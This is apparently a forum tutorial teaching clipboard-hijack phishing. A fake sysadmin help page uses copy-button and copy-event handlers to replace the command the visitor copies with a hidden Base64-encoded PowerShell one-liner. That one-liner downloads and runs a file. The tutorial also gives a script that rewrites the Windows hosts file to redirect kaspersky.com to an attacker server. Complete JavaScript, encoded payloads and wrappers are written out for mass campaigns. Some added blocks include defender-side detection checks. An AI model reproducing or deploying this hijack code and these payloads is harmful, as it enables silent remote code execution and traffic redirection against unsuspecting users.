Phishing CMD scripts idea

Tr0jan_Horse

Introduction

Hi everyone, today I would like to tell you about an unconventional but nevertheless interesting way of combining social engineering with technical skills. Let's get started. It is very common for Windows users (and Linux/macOS users too) to google for a fix for an error or for instructions on setting something up; it can be absolutely anything:

  • Installing a programming language
  • Running scripts
  • Updating components
  • Retrieving system information
  • Changing system settings (something as banal as configuring a proxy)

The peculiarity is that the target audience is very broad: the topic is of interest to ordinary users and to system administrators alike, whether beginners or experienced. Creating the phishing page is extremely easy, and the idea can be used both for mass campaigns and for targeted penetration testing.

Start

First we have to decide which task we will offer to solve; it can even be installing some console software. Find any simple sysadmin site and customize it; you can write your own or generate one with GPT, technology is on our side in this regard :) I will show a simple example. Here is a site we found, for instance:

Example of Page for Making Phishing

We see a normal layout with useful commands: in this case the user is prompted to configure a database by entering commands one after another, and each command has a copy button. That is exactly what we need. I will show a simple example, which you then adapt to the code of your own site. Here I have sketched the same fragment:

Code where will be fake payload

What is here? The HTML creates a pre block inside a div, with a button element whose identifier is btn, followed by a p block containing the bait command that the user will try to copy.

This is our bait! 

Event Handler for Button's Click

Here we have added a handler that runs once the page is fully loaded; inside it we create a variable holding our payload and then register a click handler on the button that writes the payload to the clipboard. But there is also the case where the user selects the text themselves and presses Ctrl+C, or picks "Copy" from the context menu that appears on right-click. We can add a handler for this too:

Event Handler for Copy on page

Here we have bound a copy event listener to the page: it intercepts any copy, cancels the default action as if nothing happened, and then writes our payload to the clipboard instead.
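Below is the page script described above as an added example in JavaScript; it is not the page's own code, which was shown only as screenshots. The id btn, the bait command and the wrapper template come from the page; the names BAIT, PAYLOAD, hijackCopyEvent, installClipboardHijack and clipboardTampered are this example's own, and the document and navigator objects are injected so the handlers can also be exercised outside a browser.

```javascript
// Added example, not the original page's code: the page script the text
// describes (button click + copy-event hijack), with the handlers written
// as plain functions so they can be exercised without a browser.
// The element id "btn" and the bait command come from the page; every
// other name here is this example's own.
"use strict";

// What the visitor sees in the <p> and believes they are copying.
const BAIT = "mysql -u root -p";

// What actually lands in the clipboard: the bait, then the PowerShell
// wrapper from the page. ENCODED_TO_BASE64_PAYLOAD is the page's own
// placeholder; a real page substitutes the encoded script here.
const PAYLOAD =
  BAIT +
  "\npowershell -Command \"$text = [System.Text.Encoding]::UTF8.GetString(" +
  "[System.Convert]::FromBase64String(' ENCODED_TO_BASE64_PAYLOAD ')); " +
  "powershell -Command $text\"\n";

// copy-event handler: cancel the browser's default copy (which would put
// the user's real selection on the clipboard) and write the payload.
// clipboardData.setData only takes effect inside a copy/cut handler and
// only when preventDefault() is called, so both lines are required.
function hijackCopyEvent(event, payload) {
  event.preventDefault();
  event.clipboardData.setData("text/plain", payload);
  return payload;
}

// Wires both paths on a document: the copy button and Ctrl+C / context-menu
// copy anywhere on the page. `doc` and `nav` are injected so the same code
// runs in a browser (document, navigator) and in a test with stubs.
function installClipboardHijack(doc, nav, payload) {
  doc.addEventListener("copy", (e) => hijackCopyEvent(e, payload));
  const btn = doc.getElementById("btn");
  if (btn) {
    // A click is a user gesture, which navigator.clipboard.writeText needs.
    btn.addEventListener("click", () => nav.clipboard.writeText(payload));
  }
  return { bait: BAIT, payload };
}

// In a real page this runs after the DOM is ready, as the text describes.
// Guarded so the file also loads under Node for testing.
if (typeof document !== "undefined" && typeof navigator !== "undefined") {
  document.addEventListener("DOMContentLoaded", () =>
    installClipboardHijack(document, navigator, PAYLOAD)
  );
}

// Defender-side check: what the user highlighted versus what the clipboard
// actually received. Anything beyond the visible selection is the signature
// of a page like this; "paste into Notepad before the terminal" is the
// manual form of the same comparison.
function clipboardTampered(selectedText, clipboardText) {
  return clipboardText.trim() !== selectedText.trim();
}
```

Two details matter in practice: clipboardData.setData() only takes effect inside a copy or cut handler and only if preventDefault() is called, otherwise the browser overwrites the clipboard with the real selection; and navigator.clipboard.writeText() requires a user gesture and a secure context, which a button click on an https page satisfies.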

Actually, the main phishing part is ready; what remains is to develop the payload that the user will execute. We won't experiment too much in this tutorial format; let's look at a few options that work with PowerShell on Windows.

Our task is elementary and consists of a few sequential actions:

  • Create variables with the download link and the path where the download will go
  • Download the payload
  • Run the payload

Here is our PowerShell script, which we will run via the command line:

$url = 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png';
$output = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop);
$output += '\file.png';
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process -FilePath $output

Encode it to a Base64 string:

Encoded CMD Script

We encoded it (Base64 is encoding, not encryption, so it hides nothing from anyone who bothers to decode it). It is still useful: when the script runs there is less readable content, such as links, that the user could understand at a glance. This option is not the most stealthy, but it is better than plain text and it is easier to pass the script around in this form. In the script we put the link to the payload in a variable (as an example we download the Google logo from the search page). Then we created a variable that resolves to the Desktop folder (you can just as well download to other directories: Downloads, Documents, AppData) and appended the file name that the downloaded file will get; you could also name it payload.exe and it would be downloaded and then executed. Then we call Invoke-WebRequest, passing the URL to download from and the path to save to, and finally Start-Process runs the file.

Next, we need to wrap the payload in a command that is suitable for execution from the command line.

powershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(' ENCODED_TO_BASE64_PAYLOAD ')); powershell -Command $text"

Here we run PowerShell from the command line, passing our command via the -Command parameter: it decodes the Base64 into the $text variable and then starts a second PowerShell, again via -Command, with the whole decoded script. Note that this one-liner is meant for cmd.exe: if it is pasted into a PowerShell window instead, the outer shell expands $text inside the double quotes before anything runs, and the command breaks. Let's try it!

Alert in Windows 11

This is the only warning that pops up in Windows 11: it tells the user that the text about to be pasted contains several lines and will be executed immediately. That is why we typed the long command the way we did; you can also put the user's command at the end if you want. The user agrees and the PowerShell magic happens!

Result of Command Execution

As you can see, the command executed successfully: the image was downloaded and then opened. In real conditions it could be an executable file.

Here is the full variable for the HTML:

let malwareScript = `mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICdodHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9icmFuZGluZy9nb29nbGVsb2dvLzJ4L2dvb2dsZWxvZ29fY29sb3JfMjcyeDkyZHAucG5nJzsKJG91dHB1dCA9IFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKFtTeXN0ZW0uRW52aXJvbm1lbnQrU3BlY2lhbEZvbGRlcl06OkRlc2t0b3ApOwokb3V0cHV0ICs9ICdcZmlsZS5wbmcnOwpJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJG91dHB1dApTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkb3V0cHV0')); powershell -Command $text"\n`;
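The encoding and wrapping steps above, as an added example in Node.js (not code from the original page): it rebuilds the page's one-liner from the plain script and, for the analyst side, pulls the encoded script back out of pasted text. The script and the wrapper template are the page's own; the function names and the bait argument are this example's. It also shows the caveat a practitioner will hit: the wrapper decodes with UTF8.GetString, so the Base64 must be of UTF-8 bytes, unlike powershell -EncodedCommand, which expects UTF-16LE.

```javascript
// Added example, not the original page's code. Builds the cmd-line wrapper
// from a plain PowerShell script and decodes such a wrapper back, which is
// what you do with a suspicious clipboard blob during triage.
"use strict";

// The page's script verbatim: LF line endings, no trailing newline
// (that is exactly how the page's Base64 string decodes).
const SCRIPT = [
  "$url = 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png';",
  "$output = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop);",
  "$output += '\\file.png';",
  "Invoke-WebRequest -Uri $url -OutFile $output",
  "Start-Process -FilePath $output",
].join("\n");

// The wrapper decodes with UTF8.GetString, so encode the UTF-8 bytes.
function encodeForWrapper(script) {
  return Buffer.from(script, "utf8").toString("base64");
}

// For comparison: powershell -EncodedCommand wants Base64 of UTF-16LE.
// Feeding it the UTF-8 variant (or vice versa) yields garbage, not code.
function encodeForEncodedCommand(script) {
  return Buffer.from(script, "utf16le").toString("base64");
}

// Wrapper exactly as on the page: the outer PowerShell decodes into $text
// and hands the result to a second PowerShell. It is meant to be pasted
// into cmd.exe; in a PowerShell window the outer shell would expand "$text"
// inside the double quotes before the command runs.
function buildWrapper(script) {
  const b64 = encodeForWrapper(script);
  return (
    'powershell -Command "$text = [System.Text.Encoding]::UTF8.GetString(' +
    "[System.Convert]::FromBase64String('" + b64 + "')); " +
    'powershell -Command $text"'
  );
}

// The full bait variable as in the page's HTML: visible command first,
// then the wrapper, each on its own line.
function buildBaitPayload(bait, script) {
  return bait + "\n" + buildWrapper(script) + "\n";
}

// Analyst side: find FromBase64String('...') in pasted text and decode it
// as UTF-8, the same way the wrapper does. Returns null when absent.
function extractEncodedScript(text) {
  const m = /FromBase64String\('\s*([A-Za-z0-9+/=]+)\s*'\)/.exec(text);
  if (!m) return null;
  return Buffer.from(m[1], "base64").toString("utf8");
}
```

The decoder is the half worth keeping: when a user reports "I pasted a command and something ran", the clipboard history or the shell history still holds the one-liner, and extractEncodedScript() gives you the real script without running anything.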

There is also an alternative option: we can send the user to a phishing site. No one is protected from this; you need a script for the target OS, and social engineering is needed to make the user run your code with administrator rights. To do this we modify the hosts file in Windows, C:\Windows\System32\drivers\etc\hosts. For example, when I try to open kaspersky.com my site will open instead; I will bring up a fake site locally, but you can point it at any site by entering that server's IP address. You can put anything you want there so that your resource opens instead of specific sites.

This is what it looks like before the changes:

Before Changes

We just need to add a line at the end: the IP address of the page we will send the user to, then the domain name of the site we are redirecting from. This mirrors how DNS works, we ask for a domain and get back an IP address, except that the hosts file is consulted before any DNS server is asked. Let's insert a line at the end:

127.0.0.1 kaspersky.com

Instead of 127.0.0.1 you specify the IP address of the server hosting your page. Keep in mind that a hosts entry matches the exact name only: kaspersky.com does not cover www.kaspersky.com, which needs its own line. And for an https:// site the browser will reject your server's certificate for that name (if the site uses HSTS it will not even offer a way to click through), so this works cleanly for plain http or for a user who ignores the warning.

Here is our script:

$ip_string = '127.0.0.1 kaspersky.com';
$system = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::System);
$system += '\drivers\etc\hosts';
Add-Content -Path $system -Value $ip_string

It locates the System32 folder and the hosts file inside it, then appends the string from the variable to the end of the file. Writing to hosts requires an elevated (administrator) PowerShell; without it Add-Content fails with an access-denied error. We encode it and wrap it in the previously created wrapper:

let malwareScript = `mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGlwX3N0cmluZyA9ICcxMjcuMC4wLjEga2FzcGVyc2t5LmNvbSc7CiRzeXN0ZW0gPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aChbU3lzdGVtLkVudmlyb25tZW50K1NwZWNpYWxGb2xkZXJdOjpTeXN0ZW0pOwokc3lzdGVtICs9ICdcZHJpdmVyc1xldGNcaG9zdHMnOwpBZGQtQ29udGVudCAtUGF0aCAkc3lzdGVtIC1WYWx1ZSAkaXBfc3RyaW5n')); powershell -Command $text"\n`;
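Two checks around the hosts-file trick, as an added example in JavaScript (not the page's code): appendHostsEntry() shows the newline edge case that a plain Add-Content walks into, and findOverrides() is the defender-side scan for entries that redirect watched domains. The sample file content, the watchlist and the function names are constructed for this example; only the entry 127.0.0.1 kaspersky.com comes from the page.

```javascript
// Added example, not the original page's code: a safe append for hosts
// entries and a scan that flags the kind of entry the page adds.
"use strict";

// Constructed sample: a Windows hosts file as shipped (comments only, CRLF)
// but lacking a trailing newline, which happens after hand edits.
const SAMPLE_HOSTS =
  "# Copyright (c) 1993-2009 Microsoft Corp.\r\n" +
  "#\r\n" +
  "# localhost name resolution is handled within DNS itself.\r\n" +
  "#\t127.0.0.1       localhost\r\n" +
  "#\t::1             localhost";

// Append an entry the way the page's script does, but on its own line.
// Add-Content just concatenates: if the file has no trailing newline the
// entry lands on the last line ("#\t::1 localhost127.0.0.1 kaspersky.com"),
// which is a comment, so the redirect silently never takes effect.
function appendHostsEntry(content, entry, eol = "\r\n") {
  const needsBreak = content.length > 0 && !/\r?\n$/.test(content);
  return content + (needsBreak ? eol : "") + entry + eol;
}

// Parse active (non-comment) lines into { ip, names } records.
function parseHosts(content) {
  const records = [];
  for (const raw of content.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, "").trim();
    if (!line) continue;
    const [ip, ...names] = line.split(/\s+/);
    records.push({ ip, names: names.map((n) => n.toLowerCase()) });
  }
  return records;
}

// Report watched domains that resolve via hosts. The stock file has every
// entry commented out, so any live mapping for a watched name is suspicious.
// Matching is exact, as the resolver's is: "kaspersky.com" does not cover
// "www.kaspersky.com".
function findOverrides(content, watchlist) {
  const watched = new Set(watchlist.map((d) => d.toLowerCase()));
  const hits = [];
  for (const rec of parseHosts(content)) {
    for (const name of rec.names) {
      if (watched.has(name)) hits.push({ name, ip: rec.ip });
    }
  }
  return hits;
}
```

On a real machine the content comes from reading C:\Windows\System32\drivers\etc\hosts; the watchlist is whatever set of security-vendor, update and banking domains you care about, and a non-empty result from findOverrides() is worth an alert on its own.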

Try it! The script, run from a command line with administrator privileges, changed the file:

Changed hosts File

Open it and you can see the result:

Result

We changed the configuration file, and now when you open the Kaspersky page our page opens instead. The rest of the possibilities I leave to your imagination; this trick is also used by system administrators when they want to block specific resources, redirecting them to a page that says "Access to the resource is restricted".

Thanks for reading! I look forward to your reactions, and maybe I'll keep showing tricks!





